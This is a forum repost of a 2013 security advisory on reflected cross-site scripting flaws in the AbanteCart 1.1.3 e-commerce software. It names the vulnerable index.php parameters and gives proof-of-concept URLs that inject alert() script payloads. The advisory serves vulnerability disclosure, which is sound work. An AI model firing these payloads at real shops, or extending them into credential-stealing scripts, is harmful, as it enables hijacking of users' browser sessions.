Jump to content
Praetorian503

AbanteCart 1.1.3 Cross Site Scripting

Recommended Posts

Posted

AbanteCart version 1.1.3 suffers from multiple cross site scripting vulnerabilities.


AbanteCart 1.1.3 (index.php) Multiple Reflected XSS Vulnerabilities


Vendor: Belavier Commerce
Product web page: http://www.abantecart.com
Affected version: 1.1.3

Summary: AbanteCart is a free PHP based eCommerce solution for
merchants to provide ability creating online business and sell
products online quick and efficient.

Desc: AbanteCart suffers from multiple reflected cross-site scripting
vulnerabilities. The issues are triggered when input passed via several
parameters to 'index.php' script is not properly sanitized before being
returned to the user. This can be exploited to execute arbitrary HTML
and script code in a user's browser session in context of an affected
site.

Tested on: Microsoft Windows 7 Ultimate SP1 (EN)
Apache 2.4.2 (Win32)
PHP 5.4.4
MySQL 5.5.25a


Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience


Advisory ID: ZSL-2013-5125
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5125.php


08.02.2013

--

Affected parameters: limit, page, rt, sort, currency, product_id, language, s, manufacturer_id, token.

PoC:

http://localhost/abantecart/index.php?limit=%22%3E%3Cscript%3Ealert%281%29;%3C/script%3E&page=1%22%3E%3Cscript%3Ealert%282%29;%3C/script%3E&rt=product/special%22%3E%3Cscript%3Ealert%283%29;%3C/script%3E&sort=%22%3E%3Cscript%3Ealert%284%29;%3C/script%3E
http://localhost/abantecart/index.php?currency=%22%3E%3Cscript%3Ealert%281%29;%3C/script%3E&product_id=109%22%3E%3Cscript%3Ealert%282%29;%3C/script%3E&rt=product/product
http://localhost/abantecart/index.php?rt=product/manufacturer&manufacturer_id=15%22%3E%3Cscript%3Ealert%281%29;%3C/script%3E
http://localhost/abantecart/index.php?rt=%22%3E%3Cscript%3Ealert%281%29;%3C/script%3E&s=your_admin%22%3E%3Cscript%3Ealert%282%29;%3C/script%3E&token=957bf7cb71078f4471807da1c42d721e%22%3E%3Cscript%3Ealert%283%29;%3C/script%3E

Source: PacketStorm

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...